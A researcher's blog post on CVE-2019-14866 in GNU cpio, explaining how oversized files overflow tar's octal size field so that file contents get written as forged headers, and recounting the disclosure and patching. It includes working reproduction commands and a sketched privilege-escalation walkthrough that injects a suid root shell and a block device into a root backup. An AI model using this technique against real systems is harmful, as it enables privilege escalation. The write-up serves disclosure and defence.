CVE-2019-14866: GNU cpio
I found a security bug in GNU cpio and thought I’d write down the story of that. It’s not the most interesting bug in the world, but it may still be an interesting story to some.
An odd limit
The whole thing started with me looking at the manpage
-H, --format=FORMAT
Use given archive FORMAT. Valid formats are (the number in
parentheses gives maximum size for individual archive member):
bin The obsolete binary format. (2147483647 bytes)
odc The old (POSIX.1) portable format. (8589934591 bytes)
newc The new (SVR4) portable format, which supports file
systems having more than 65536 i-nodes. (4294967295 bytes)
crc The new (SVR4) portable format with a checksum added.
tar The old tar format. (8589934591 bytes)
ustar The POSIX.1 tar format. Also recognizes GNU tar archives, which are
similar but not identical. (8589934591 bytes)
hpbin The obsolete binary format used by HPUX's cpio (which stores device
files differently).
hpodc The portable format used by HPUX's cpio (which stores device files
differently).
What’s wrong with this picture? Those are some very odd size limits. 2GiB and 4GiB I understand, as it’s 32-bit signed and unsigned int. But tar having a max size of 8GiB? 33 bits? That doesn’t make any sense.
I was lucky to find this, because some versions of the manpage don’t have this info. E.g. this and this.
Turns out the tar header format stores file size in 12 bytes, as a string… in octal! There are variants and extensions, but long story short that’s the common limit.
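To make the 33 bits concrete, here is a minimal sketch of the arithmetic. It assumes the 12-byte field holds 11 octal digits plus a terminator; the function name is made up for illustration.

```c
#include <stdint.h>

/* Largest value representable in `digits` octal digits: 8^digits - 1.
 * Hypothetical helper, not taken from cpio or tar. */
uint64_t max_octal_value(unsigned digits)
{
    uint64_t v = 0;
    for (unsigned i = 0; i < digits; i++)
        v = (v << 3) | 7;   /* append one more octal digit with all bits set */
    return v;
}
```

With 11 digits this gives 8589934591, which is 2^33 - 1 and matches the limit in the manpage.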
That’s… terrible. But it’s a format from the stone age, so maybe can be forgiven.
I wonder what happens if you exceed that limit… oh… oh no
$ dd if=/dev/zero seek=16G bs=1 count=0 of=testfile.dat
$ echo testfile.dat | cpio -H tar -o | tar tf -
-rw-r--r-- 1000/1000 0 2019-11-07 13:04 testfile.dat
^^^^\--- That's the size according to tar.
$ echo testfile.dat | cpio -H tar -o | wc -c
17179870720
^^^^^^^^^^^\-- That's the total size of the tar file.
Oh no. The tar format is a series of “hey, here comes a file named X, that’s Y bytes long, after those Y bytes I’ll tell you about the next file”.
I’ve generated a tar file that says “hey, here comes a file named testfile.dat that’s 0 bytes long. After those 0 bytes comes another file header.”
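A rough sketch of how a reader walks such a stream may help. This is a simplified illustration, not code from tar or cpio: it assumes 512-byte blocks, a zero-padded octal size field at offset 124, and an archive held entirely in memory. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define TAR_BLOCK    512
#define TAR_SIZE_OFF 124   /* offset of the size field within a header block */
#define TAR_SIZE_LEN 12

/* Parse the octal size field, stopping at the first non-octal byte. */
static uint64_t tar_member_size(const unsigned char *hdr)
{
    uint64_t size = 0;
    for (size_t i = 0; i < TAR_SIZE_LEN; i++) {
        unsigned char c = hdr[TAR_SIZE_OFF + i];
        if (c < '0' || c > '7')
            break;
        size = (size << 3) | (uint64_t)(c - '0');
    }
    return size;
}

/* Count the members a reader would see: read a header, skip the number of
 * data bytes the header claims (rounded up to a block), repeat. Stops at a
 * header with an empty name or at the end of the buffer. */
size_t tar_count_members(const unsigned char *buf, size_t len)
{
    size_t count = 0, off = 0;
    while (len - off >= TAR_BLOCK && buf[off] != '\0') {
        uint64_t size = tar_member_size(buf + off);
        uint64_t padded = (size + TAR_BLOCK - 1) / TAR_BLOCK * TAR_BLOCK;
        count++;
        off += TAR_BLOCK;
        if (padded > len - off)
            break;          /* claimed data runs past the end of the buffer */
        off += (size_t)padded;
    }
    return count;
}
```

If the first header claims 0 bytes, the reader treats the very next block as a header, even though the writer put file contents there.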
This means I can make cpio read data (the contents of a file it reads), and write it as if it’s metadata (a tar header):
$ tar cf suffix.tar AUTHORS # Create some payload.
$ dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar # Pad it to "look like" 0 bytes.
$ echo suffix.tar | cpio -H tar -o | tar tvf - # Feed it to cpio.
-rw-r--r-- 1000/1000 0 2019-08-30 16:40 suffix.tar
-rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS
The point here is that cpio was fed one file (suffix.tar) to put into the tar file, but it put two files in there. cpio never read AUTHORS, and it should not be listed.
But so what?
The above is obviously wrong, but how is it a security issue?
It’s a security issue because it’s not just the contents of the injected files that can have arbitrary content, but also the type of file, owner, and suid bits.
I could prepare a payload tar file that contains a suid root shell, and a /dev/sda block device.
evil$ # 1) Prep payload
evil$ ./generate_evil_data --out /home/evil/foo.tar
root# # 2) root user performs backup
root# find /home -print0 | cpio -0 -H tar -o > /var/backup/h.tar
root# # 3) root user restores
root# cd /
root# tar xf /var/backup/h.tar /home/evil/
evil$ # 4) evil user uses newly created rootshell, or writes to /dev/sda
evil$ ls -l /home/evil/
-rwsr-xr-x 1 root root 61176 Aug 3 2018 /home/evil/rootshell
brw-rw---- 1 evil evil 8, 0 Oct 7 11:21 /home/evil/sda-pwned
evil$ /home/evil/rootshell
# id
uid=0(root) gid=0(root) groups=0(root)
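The reason the injected header is so powerful is that mode and file type are just more bytes in the same 512-byte block. As a rough sketch, here is a hypothetical check (not something cpio or tar does) that flags headers carrying setuid/setgid bits or device nodes. It assumes the ustar layout: an octal mode at offset 100 and the type flag at offset 156.

```c
#include <stdbool.h>
#include <stddef.h>

#define TAR_MODE_OFF     100   /* mode: 8 bytes of octal ASCII */
#define TAR_MODE_LEN     8
#define TAR_TYPEFLAG_OFF 156   /* one byte: '0' regular, '3' char dev, '4' block dev */

/* Parse an octal field, skipping leading spaces, stopping at the first
 * non-octal byte. */
static unsigned parse_octal(const unsigned char *p, size_t n)
{
    unsigned v = 0;
    size_t i = 0;
    while (i < n && p[i] == ' ')
        i++;
    for (; i < n && p[i] >= '0' && p[i] <= '7'; i++)
        v = (v << 3) | (unsigned)(p[i] - '0');
    return v;
}

/* Hypothetical helper: true if the header describes a setuid/setgid file
 * or a character/block device. */
bool tar_member_is_privileged(const unsigned char *hdr)
{
    unsigned mode = parse_octal(hdr + TAR_MODE_OFF, TAR_MODE_LEN);
    unsigned char type = hdr[TAR_TYPEFLAG_OFF];
    bool setid = (mode & 06000) != 0;            /* setuid (04000) or setgid (02000) */
    bool device = (type == '3' || type == '4');  /* character or block device */
    return setid || device;
}
```

Nothing in the archive distinguishes a header cpio wrote on purpose from one smuggled in as file contents, so whoever restores the backup as root recreates whatever the header asks for.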
Finding the code culprit
static void // [no error checking]
to_oct(long value, […])
{
[… write up to 11 octal ASCII digits, plus NUL byte,
not checking whether `value` fit …]
}
[…]
void // [no error checking]
write_out_tar_header (struct cpio_file_stat *file_hdr, int out_des)
[…]
write_out_header([…])
[…]
write_out_tar_header (file_hdr, out_des); /* FIXME: No error checking */
return 0; // [0 means success]
That “FIXME” is in the original, and appears to have been there since at least 1994.
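For illustration, here is a minimal sketch of what a checked conversion could look like, next to an unchecked one. This is not the actual cpio code or the patch. The names are made up, and the zero padding and "keep the low-order digits" behaviour are assumptions, chosen because they are consistent with the size 0 seen earlier.

```c
#include <stddef.h>
#include <stdint.h>

/* Unchecked: writes the low `digits` octal digits of value, zero-padded,
 * followed by NUL. Higher digits are silently dropped. */
void to_oct_truncating(uint64_t value, size_t digits, char *where)
{
    where[digits] = '\0';
    for (size_t i = digits; i-- > 0; ) {
        where[i] = (char)('0' + (value & 7));
        value >>= 3;
    }
}

/* Checked: returns -1 (leaving `where` untouched) if value needs more than
 * `digits` octal digits, otherwise writes it and returns 0. */
int to_oct_checked(uint64_t value, size_t digits, char *where)
{
    /* 22 octal digits cover all 64 bits, so only shift when it is defined. */
    if (digits < 22 && (value >> (3 * digits)) != 0)
        return -1;
    to_oct_truncating(value, digits, where);
    return 0;
}
```

A 16GiB file has size 2^34, which is 200000000000 in octal: twelve digits. Keeping only the low eleven leaves 00000000000, so the header claims 0 bytes. The checked variant gives the caller a chance to refuse instead.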
There may be millions of scripts out there using cpio that are vulnerable.
The tar format is largely to blame here. It’s a “packet in packet” attack which could have been prevented if tar, like many many other formats and protocols, used a regular language (also see this talk).
Well, the tar format and a code bug from like 1994.
So is this only GNU, or more implementations?
OpenBSD, as usual, is fine. I’ve not checked other implementations. But it sure is pushing me from Linux to OpenBSD.
Reporting
I reported to the bug-cpio mailing list, being a bit vague describing it only as “hey, that’s surprising output”, hoping to get the patch in early.
After 10 days with no reply I emailed the Debian package maintainer and cpio owner directly. No response.
Another week later I started emailing security@debian.org and secalert@redhat.com. Red Hat took 10 days to respond. Debian took 13 days.
It took a bit of back and forth to explain why this was a security issue, but Red Hat eventually created CVE-2019-14866.
On 2019-10-25 the cpio maintainer created a separate patch for the problem. It’s multiple changes in one, which is not great, so for backporting the change to Debian old and oldold stable the Debian package maintainer chose to go with my minimal patch (with a 32-bit arch fix).
Other links
PS
Oh no, I forgot to give the bug a name, logo, and website. :-(